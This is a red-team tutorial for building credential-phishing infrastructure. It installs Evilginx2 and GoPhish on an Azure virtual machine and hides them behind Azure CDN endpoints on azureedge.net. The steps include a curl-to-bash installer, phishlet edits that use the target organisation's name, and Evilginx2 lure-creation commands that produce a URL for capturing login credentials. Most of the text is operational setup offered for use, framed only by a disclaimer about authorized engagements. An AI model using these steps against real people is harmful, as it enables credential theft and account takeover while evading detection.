Comment on page
ther you stumbled across this post *by accident* or you need to create a good phishing campaign, I am here to help you with all that and a bag of chips!
This article aims to teach Offensive teams how to mask their phishing infrastructure using a Content Delivery Network (CDN) in Azure. The setup itself is very easy, but understanding how it works may be more convoluted. Let me walk you through the steps of creating a virtual machine in Azure to send out a phishing email.
I shall not be responsible or liable for any misuse or illegitimate use of this guide. This guide is only to be used in authorized penetration testing or red team engagements where the operator(s) has(ve) been given explicit written permission to carry out social engineering.
A word of warning! This article is not an in-depth guide on how to:
- Show you the detailed networking of a CDN.
- Show you how Apache2 works.
- Show you how TMUX works.
- Show you how to set up a phishing campaign.
- How to set up an SMTP relay (i.e. Mailgun).
First things first, we want to setup a virtual machine in Azure. The reason why we use Azure is to get an SSL certificate from Let's Encrypt using:
certbot certonly --register-unsafely-without-email -d YOURDNSNAME.eastus.cloudapp.azure.com
Let's get started:
- 1.Make sure to grab your SSH keys for this. Default user: azureuser
- 2.Go to the resource you just created and click on where it says "Public IP Address" (it should be located in the "Essentials" section of the Resource)
- 7.Lastly, let's access that virtual machine you just created!
- 8.In a bash console (or PowerShell), SSH into the Virtual Machine you just created:
ssh -L 3333:localhost:3333 azureuser@[ip-address]replacing [ip-address] with the IP Address of your virtual machine
Full credit for this section goes to Fin3ss3g0d for this beautiful tool! This tool automates the process of creating and making GoPhish, Evilginx2, and Apache flow together. Luckily for you, I've created a one-liner that happens to streamline this process and gives some nice prompts!
!!WARNING: THIS HAS ONLY BEEN TESTED ON DEBIAN AND UBUNTU IMAGES!!
Let's get started!
- 1.First, when in the bash shell, run
curl -sSL https://raw.githubusercontent.com/stevesec/egp_basicinstall/main/basic_install.sh | bash
- 1.Make sure you are the root user! This script will automatically detect if you are in the sudoers group!
- 2.Next, hit the "Enter" key through all of the prompt until you get to the "root domain" prompt, enter
azureedge.net; we will be using this later!
- 3.After the root domain prompt, enter your subdomains; please use the following (ensuring there is a space in between, replacing target with your target organization):
- 2.Note these for later!
- 3.Ensure that these both have "-login" and "-account" or this process will not work!
- 4.Then, enter in your redirect URL (a good rule of thumb is you want to use it based on your targets infrastructure, i.e. Office365, or Google Account Login).
- 5.Enter in the RID you want to use (this may be expanded on in the future), testing is required for Rule Engine implementation.
- 6.The next couple of prompts are user's preference.
- 1.Enabling the proxying for the root domain should be no as we do not own "azureedge.net".
- 2.Enabling the Live Feed opens up a prompt on port 1337.
- 3.Enabling the Apache Blacklist gives you a blacklist of all IP Addresses to reject from your web server.
- 7.If you're satisfied with your "User Settings", click "Yes". If not, click "Edit Settings".
- 8.If you want to use MailGun, I have included a prompt for setting that up, if not click "No"
- 9.The setup process should begin and EvilGoPhish should be installed in
Remember that prompt for YOURDNSNAME.eastus.cloudapp.azure.com??? You're going to need it now!
- 1.In the bash shell, type
certbot certonly --register-unsafely-without-email -d YOURDNSNAME.eastus.cloudapp.azure.com, replacing
YOURDNSNAME.eastus.cloudapp.azure.comwith the one created above.
- 2.Select 1 in the prompt which will spin up a temporary webserver
- 3.Follow the prompts, making sure to agree with the Terms of Service
- 1.If this prompt fails, check your listening ports:
netstat -tulpnApache2 might be running!
- 4.If all goes well, you should a nice, shiny, new certificate from Let's Encrypt! Copy where the certificate is placed (usually in
Let's stick that in the enabled sites:
- 1.Edit with your favorite text editor 😉
nano /etc/apache2/sites-enabled/000-default.confand enter in your certificate where it says:
- 2.If all goes well here, you should be able to type:
systemctl restart apache2.service
- 1.NOTE: Apache2 will be listening on IPv6 :::443, to change this edit:
/etc/apache2/ports.confand now it should be listening on IPv4 0.0.0.0:443
Remember the subdomains you created with the bash one-liner? Let's grab those and get a move on with creating the CDN in Azure.
- 1.Search for and go to Front Door and CDN Profiles and follow the prompts:
- 1.Enter in to the "CDN Endpoint Name" your first subdomain (don't worry, we'll be adding the second one shortly)
- 2.CDN Endpoint Name: target-login
- 3.Origin Type: Custom Origin
- 4.Origin hostname: IP Address of Virtual Machine
- 2.Click "Review + Create"
- 3.Go to the Resource that was just created.
- 4.Click on it and click on "Origin"
- 5.Click on where it states "origin-ip-address"
- 5.Change the "Origin host header" to be the CDN Endpoint Name (i.e. target-login.azureedge.net)
- 6.Click "Save"
- 7.Navigate to "Compression", turn it off, and click "Save".
- 8.Navigate to "Caching Rules", set it to "Bypass caching for query strings", and click "Save".
- 9.Click on "+ Endpoint" to create a second endpoint.
- 1.Enter in to the "CDN Endpoint Name" your second subdomain.
- 2.CDN Endpoint Name: target-account
- 3.Origin Type: Custom Origin
- 4.Origin Hostname: IP Address of Virtual Machine
- 5.Origin Host Header: CDN Endpoint Name (i.e. target-account.azureedge.net)
- 10.Click on "Add".
- 11.Follow steps 8 & 9 for your second CDN
We will now be editing the phishlets for Evilginx2. This will allow us to use the two subdomains we created.
- 1.Edit with your favorite text editor 😉
- 2.Under "proxy_hosts":
- 1.Change "phish_sub: 'login'" to "phish_sub: 'target-login'", and
- 2.Change "phish_sub: 'account'" to "phish_sub: 'target-account'"
Lastly, we will be starting up EvilGoPhish. We will utilize Evilginx2 in developer mode as this mode gives us a self-signed certificate that can be used in conjunction with the SSL certificate we obtained from Let's Encrypt.
- 1.From the
/etc/.evilgophish/directory, navigate to the gophish directory.
- 2.Start GoPhish noting the admin password (this will need to be changed later)
- 2.This will start up the gophish.db to be used with Evilginx2
- 4.Navigate back to the evilginx2 directory.
- 5.Start Evilginx2:
./evilginx2 -g ../gophish/gophish.db -debug -developer -p phishlets/
- 2.Ensure to ALWAYS use developer mode with a CDN in front.
- 3.This will start up evilginx2 in developer mode, not requiring an SSL certificate
- 6.Now, let's configure Evilginx2! Type in:
config domain azureedge.net
config ip [ip address of Virtual Machine]
phishlets hostname o3652 azureedge.net
phishlets enable o3652
lures create o3652
lures get-url 0
- 7.With that URL, enter that into GoPhish and you should be ready to go!
- 8.If everything worked out, you should now have a domain with azureedge.net that captures credentials